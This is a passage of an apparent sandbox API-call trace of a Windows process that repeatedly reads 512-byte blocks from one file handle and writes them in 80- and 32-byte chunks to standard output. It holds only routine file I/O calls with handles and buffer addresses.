1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 
[0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.844] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.844] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 
[0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] GetFileType (hFile=0x50) returned 0x1 [0119.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.844] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0119.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.845] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.845] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] GetFileType (hFile=0x50) returned 0x1 [0119.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.846] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.846] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.847] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType 
(hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] GetFileType (hFile=0x50) returned 0x1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.847] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.848] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.848] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.848] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.848] GetFileType (hFile=0x50) returned 0x1 [0119.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.854] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.854] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, 
lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] GetFileType (hFile=0x50) returned 0x1 [0119.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.855] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, 
lpOverlapped=0x0) returned 1 [0119.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.856] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, 
lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] GetFileType (hFile=0x50) returned 0x1 [0119.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.856] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.857] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] GetFileType (hFile=0x50) returned 0x1 [0119.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.857] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 
[0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] GetFileType (hFile=0x50) returned 0x1 [0119.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.858] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.858] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.858] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.858] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, 
lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.859] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] GetFileType (hFile=0x50) returned 0x1 [0119.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.860] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: 
